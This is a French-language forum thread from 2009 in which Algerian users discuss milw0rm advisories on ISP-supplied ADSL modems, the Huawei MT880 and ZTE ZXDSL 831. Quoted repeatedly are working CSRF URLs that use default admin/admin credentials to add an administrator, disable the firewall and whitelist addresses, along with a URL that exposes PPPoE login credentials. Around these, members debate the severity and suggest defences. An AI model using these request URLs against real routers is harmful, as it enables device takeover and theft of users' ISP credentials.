strongh Posté(e) le 27 août 2009 Share Posté(e) le 27 août 2009 Bonsoir J'ai trouvé par hasard ce sujet sur le site milworm.com concernant une vulnérabilité sur nos modems Fawri MT880, ya t il quelqu'un qui peut m'expliquer cette vulnérabilité. Description: Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use. Overview: Huawei MT880 firmware and its default configuration has flaws, which allows LAN users to gain unauthorized full access to device. Here are just limited PoCs. Default credentials on the web-based management interface: admin/admin Possible XSRFs: Adding an administrator user: http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 Disabling firewall/anti-DoS... features: http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 Adding a MAC address to the whitelist: http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 Adding an IP address allowed by the firewall: http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 Over flaws are not covered in this advisory. Cheers /JA # milw0rm.com [2009-08-24] Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité lakamora Posté(e) le 27 août 2009 Share Posté(e) le 27 août 2009 moi aussi j'ai trouvé cette faille c pour auvrire des port pour hacke avec juste un lien Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité lakamora Posté(e) le 27 août 2009 Share Posté(e) le 27 août 2009 mais ça marche sur tout les modem qui on un mot de passe par défaut Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité HAVOC Posté(e) le 27 août 2009 Share Posté(e) le 27 août 2009 C'est n'est pas une faille, il s'authentifie avec les mot de passe par défaut... rien n'avoir avec une faille à proprement dit. Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
ButterflyOfFire Posté(e) le 28 août 2009 Share Posté(e) le 28 août 2009 Merci pour l'info. Entre nous, les modems sont fournis avec le mot de passe par défaut n'est ce pas ? admin:admin Et ce n'est pas tout le monde qui est connaisseur en la matière, n'est ce pas ? Donc une grande majorité des possesseurs de ces modems sont vulnérables à moins qu'une mise à jour du firmware verra le jour ou que l'opérateur Algérie Télécom sensibilise ses clients. Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
abitaf Posté(e) le 28 août 2009 Share Posté(e) le 28 août 2009 (modifié) 1) la preumiere pour le Huawei MT880 Description: Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use. Overview: Huawei MT880 firmware and its default configuration has flaws, which allows LAN users to gain unauthorized full access to device. Here are just limited PoCs. Default credentials on the web-based management interface: admin/admin Possible XSRFs: Adding an administrator user: http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 Disabling firewall/anti-DoS... features: http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 Adding a MAC address to the whitelist: http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 Adding an IP address allowed by the firewall: http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 Over flaws are not covered in this advisory. Cheers /JA # milw0rm.com [2009-08-24] 2) la deuxieme pour le ZXDSL 831 ----------------------------------------------------- -->> Found By SuNHouSe2 [ALGERIAN HaCkEr] --> Made in "Maghnia City" (DZ) --> Contact : sunhouse2@yahoo.com --> Greetz to : His0k4 all my friends --> Good Ramadan to all muslims ----------------------------------------------------- Exploit tested on modem with this informations : ZTE CORPORATION Date : NOV 2008 Product : ADSL Modem Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV ----------------------------------------------------- Introduction: This modem is used by many providers in the world like russia india and algeria [used by provider and all clients of "Easy ADSL"]. Exploit : We can get access to to configuration of the modem , and get PPPOE user & password. Go only here http://192.168.1.1/vpivci.cgi A video uploaded to explain how we can use this exploit to get PPPOE sessions with user & password download video demonstration > http://www.geeksecurity.org/vid/zxdsl%20exploit.rar http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar ------------------------------------------------------ # milw0rm.com [2009-08-18] Modifié le 28 août 2009 par abitaf Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité HAVOC Posté(e) le 28 août 2009 Share Posté(e) le 28 août 2009 Et ce n'est pas tout le monde qui est connaisseur en la matière, n'est ce pas ? Donc une grande majorité des possesseurs de ces modems sont vulnérables à moins qu'une mise à jour du firmware verra le jour ou que l'opérateur Algérie Télécom sensibilise ses clients. Je ne vois pas en quoi une mise à jour du firmware corrigera cela puisqu'il ne s'agit pas d'une faille mais des identifiants par défauts, les liens qui sont cités ne sont que les liens des scripts de l'interface admin du modem, on peut pas y accéder directement sans s'identifier. L'unique solution serait une génération d'identifiant par défaut pour chaque client lors de la remise du modem. Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Hakim3i Posté(e) le 28 août 2009 Share Posté(e) le 28 août 2009 Il faut juste changer le mot de passe par défaut Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
ktalgerie Posté(e) le 28 août 2009 Share Posté(e) le 28 août 2009 c'est un exploit de notre très cher Djalil. Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
PaPi||OnDZ Posté(e) le 28 août 2009 Share Posté(e) le 28 août 2009 si je comprend bien, a la place de l'adresse 192.168.1.1 on va mettre une plage ip de l'opérateur fawri ( après scanne de l'adresse ip ) et on peut accédé au modem d'un utilisateur dans le cas ou se dernier na pas changer son mot de passe . !!!! ??? Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
tewfik Posté(e) le 29 août 2009 Share Posté(e) le 29 août 2009 si je comprend bien, a la place de l'adresse 192.168.1.1 on va mettre une plage ip de l'opérateur fawri ( après scanne de l'adresse ip ) et on peut accédé au modem d'un utilisateur dans le cas ou se dernier na pas changer son mot de passe . !!!! ??? imho, le port 23 n'est disponible qu'a partir du lan Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
racNET Posté(e) le 29 août 2009 Share Posté(e) le 29 août 2009 Je ne trouve pas que c'est une faille puisqu'il faut être connecté en tant qu'admin pour pouvoir mettre ces paramètres.Ce Jérôme n'a fait que donner le lien direct pour faire les manipulations. si je comprend bien, a la place de l'adresse 192.168.1.1 on va mettre une plage ip de l'opérateur fawri ( après scanne de l'adresse ip ) et on peut accédé au modem d'un utilisateur dans le cas ou se dernier na pas changer son mot de passe . !!!! ??? C'est impossible si le firewall du modem est activé (J'espère qu'il en possède un !). Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
tewfik Posté(e) le 30 août 2009 Share Posté(e) le 30 août 2009 C'est impossible si le firewall du modem est activé (J'espère qu'il en possède un !). dans une situation normale, l'accès à l'interface d'administration en web ou en telnet n'est pas possible sur l'interface wan du modem en question (AT) (uniquement à partir de l'interface lan), ce qui n'est pas le cas de certains modems (EE). on peut evisager ceci tres vaguement comme une vulnerabilité si le modem est placé sur un réseau lan dans lequel les utilisateurs ne sont pas dignes de confiance (cyber café?) ou ils pourraient faire joujou avec la configuration (vol des credentiels, quand ils sont gentils) certains constructeurs générent le mot de passe à partir de l'adresse mac (par ex), ou à partir du numero de serie (seul l'acces physique peut fournir l'information), il est vrai que mettre un mot de passe statique d'une telle trivialité n'est pas tres ingenieux. Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
bilmagic Posté(e) le 31 août 2009 Share Posté(e) le 31 août 2009 si vous prenez cela comme une faille alors tous les netgear les dlink les cisco les speedtouch sont vulnérables. cest un raccourci pour les opération de configuration cest tout il te faut le mot de passe , pas besoin de changer le firmware, change le mot de passe, puis l'accès depuis le wan au modem est bloqué par défaut. cest un gar qui veut ce montrer cest tout sur (milworm). Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
bilmagic Posté(e) le 31 août 2009 Share Posté(e) le 31 août 2009 Foutezzzeeeeeeeeeeeeeeeeee............... Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
tixxDZ Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 (modifié) salam C'EST BIEN DES FAILLES QUI SONT CONNUS DEPUIS ... moi j'avais connaissences de ces failles depuis 1 ou 2 ans, en plus tout les modems ou routeurs avec interface Web sont vulnérables a ces CSRF et XSS et d'authentifications ... Je confirme que meme les routeurs d'eepad, AT ... etc (tu te souviens un jour ButterflyOfFire sur IRC) sont vulnérables, seulement les mise à jours des firmwares ne sont pas la, alors faut pas donner aux milliers des script kiddies ... Petite synthese (je vais essayer de donner le moins d'info possible): - il ne s'authentifie pas avec le password. - il y a un GROOOOOOOOS problème d'authentification, dans ce cas le password n'est vraiment pas utilisé ... - il y a pleins de failles XSS sur ces routeurs ... - il y a pleins de failles CSRF (modifier tous les données et configs) - par le contexte de ces failles ces attaques peuvent parfaitement etre exploité depuis le Wan (internet) - le chercheur dit que c'est failles sont activé seulement depuis le LAN alors qu'on peut parfaitement le faire depuis le Wan (Internet) si il y a une certaine config et si ... - ... pleins d'autres ... Conslusion: les gens qui ont pondu ces modems n'ont jamais pensé à l'aspect sécurité et ils sont au courant et ... Protection (rapidement): - faire une mise à jour du firmware si c'est possible (mais je pense que ce n'est pas possible). - chager le password. - configurer la connection depuis votre PC et pas depuis votre Modem (info: password sur PC, IP de connection attribué au PC qui contient un firewall) - firewall qui filtre l'accée au modem (car l'accée du modem va se faire depuis le PC relié au modem, ce PC fonctionne en mode routeur). - ne pas consulter des sites Web et des pages Web ou des liens suspects ou que vous ne connaissez pas ... - peut etre un modem USB est plus pratique (moi j'utilise un ce moment), mais c'est sure qu'ils ont d'autres failles ... - relire le poste de tewfik. - ... a suivre en gros voici le conseil de secdz: - "Ne pas faire confiance à quoique se soit, à commencer par ton PC et ces routeurs" - "Rester sous la radar et ne pas attirer l'attention" Ma situation qui résume ce que secdz a dit: à cause de mes petits frères (telechargment de logiciel infécté depuis des sites arabs) j'ai du changé le password plusieurs fois en plus avec leurs attitude ça ne va pas se régler . @bilmagic: oui désolé c'est encore moi , tous ce que tu cite est vulnérable meme ces sisco ... @racNET hbibi rak jari SLVPL si il y a un membre qui à plus de temps que moi, qu'il réorganise mon poste en un nouveau sujet (les sollutions et apporter des nouvelles aussi), vraiment désolé je manque énormément de temps, merci encore. PS: je n'ai jamais exploité ces failles (faut pas nuir aux autres), je ne ferai jamais ça inchallah. saha ftourkoum. Modifié le 1 septembre 2009 par tixxDZ Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
tixxDZ Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 (modifié) salam @bilmagic c'est pas des fouteeeeeeeezzzzzzzz, désolé mais il ne faut pas dire des conneries si on ne maitrise pas. @abitaf c'est des failles CSRFs et preseque tous les routeurs avec interface Web sont vulnérables. C'est parfaitement exploitable à 100% sans connaitre le password ... concernant le premier (chercheur français): - il dit que c'est accessible depuis le Lan alors qu'on peut parfaitement (peut etre forger des paquets) accéder depuis le Wan (internet). - il publie seulement quelques CSRF alors qu'il y a pleins d'autres et encore plus dangereuses (mais il dit qu'il a d'autres). - il y a pleins d'autres XSS qui peuvent etre stocké sur le modem. concernant le deuxième (chercheur algérien): - c'est pas des CSRF, c'est un problème d'authentification, si un utilisateur - l'exploitation est très très simple. - dans la video le chercheur dis que le password est crypté => c'est faux, ce n'est qu'un simple encodage. - l'exploitation est très très simple. PS: désolé abitaf mais peut etre que ton poste est hors charte, faut effacer. @ktalgerie si tu fais allusion à moi, alors normalement je ne publie pas ce genre de faille et surtout sur milw0rm (c'est des trucs qui seront utilisé par des scripts kiddies et qui vont faire du mal à d'autres), je publie seulement si l'exploitation ou le PoF est cool (challenge) sinon pas besoin je vais simplement perdre plus de temps. PS: mon vrai nom est djalal et c'est pas moi qui a publié, bon rétablissement KT inchallah. je poste seulement pour signaler, je ne vais pas dire plus, comment se protéger et bien consulter ce topic "http://www.forumdz.com/showthread.php?t=16854&page=2", merci encore pour votre lecture. saha ftourkoum. Modifié le 1 septembre 2009 par tixxDZ Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité HAVOC Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 Adding an administrator user: http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 Disabling firewall/anti-DoS... features: http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 Adding a MAC address to the whitelist: http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 Adding an IP address allowed by the firewall: http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 Over flaws are not covered in this advisory. Cheers /JA # milw0rm.com [2009-08-24] Elle est où la faille ici ? Les identifiants sont inclus à l'URL... on voit bien que l'utilisateur ADMIN accède au routeur (192.168.1.1) avec le mot de passe ADMIN. C'est grossomodo un appel direct des scripts mais cela n'outre passe pas l'authentification. Il suffit de personnaliser les identifiants de son routeur pour éviter ce problème. Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité HAVOC Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 Perso j'ai pas trop pigé, les identifiants sont bien controlés non? le admin admin c'est la valeur par defaut... est ce que ces méthode marche sur un routeur dont les identifiants ont été personnalisés ? Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
lalim92 Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 Perso j'ai pas trop pigé, les identifiants sont bien controlés non? le admin admin c'est la valeur par defaut... est ce que ces méthode marche sur un routeur dont les identifiants ont été personnalisés ? Je ne pense pas non. ça ne marche que sur des routeurs dont les identifiants sont ceux par défauts (admin/admin) Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité HAVOC Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 Je ne pense pas non. ça ne marche que sur des routeurs dont les identifiants sont ceux par défauts (admin/admin) Donc ce n'est pas une faille lol Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
lalim92 Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 Donc ce n'est pas une faille lol non ils nous ont juste refilé des liens qui permettent de faire des choses pas très clean Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Walid. Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 Authentification ou pas, tout lien vers une application Web pouvant modifier directement la config sans confirmation est considéré comme faille CSRF Et concernant les mots de passe par défaut des routeurs je t'assure que 99% des algériens les laissent ! Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
bilmagic Posté(e) le 1 septembre 2009 Share Posté(e) le 1 septembre 2009 Authentification ou pas, tout lien vers une application Web pouvant modifier directement la config sans confirmation est considéré comme faille CSRF Et concernant les mots de passe par défaut des routeurs je t'assure que 99% des algériens les laissent ! pour cette faille sera accomplie il faut que l'utilisateur est complice sans en être conscient. par exemple si tu veux changer ou obtenir quelque configs de mon modem il faut que tu connaisse monn ip je te fais confiance j'execute un script, je charge une image ... de votre part si j'ai modifié mon mot de passe alors ton attaque réussit que lorsque je suis déja authentifié . Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
tixxDZ Posté(e) le 2 septembre 2009 Share Posté(e) le 2 septembre 2009 @HAVOC: tant qu'il y aura des CSRF alors il y aura toujours un risque même après avoir changé le password ... etc, car si l'utilisateur est déja authentifié exemple avec un cookie alors ces attaques (CSRF ...) n'ont pas besoin de password ... Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Rejoindre la conversation
Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.